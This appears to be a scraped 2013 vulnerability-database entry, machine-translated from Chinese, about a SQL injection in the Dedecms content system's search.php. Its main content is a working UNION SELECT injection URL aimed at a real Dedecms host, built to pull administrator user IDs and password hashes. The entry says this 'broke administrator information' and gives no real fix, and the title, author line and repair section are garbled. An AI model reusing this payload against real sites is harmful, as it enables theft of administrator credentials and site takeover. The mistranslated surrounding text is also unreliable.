Dedecms sub-Station explosion SQL injection-vulnerability warning-the black bar safety net

2013-05-18T00:00:00
ID MYHACK58:62201338807
Type myhack58
Reporter 佚名
Modified 2013-05-18T00:00:00

Description

http://help.dedecms.com//plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,pwd,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2+from+%2 3@__admin%2 3@\"+]=a

Broke administrator information..

Vulnerability author: southern not men

Vulnerability proof:

!

Repair solutions:

Domestic thehackinglarge cattle are know drops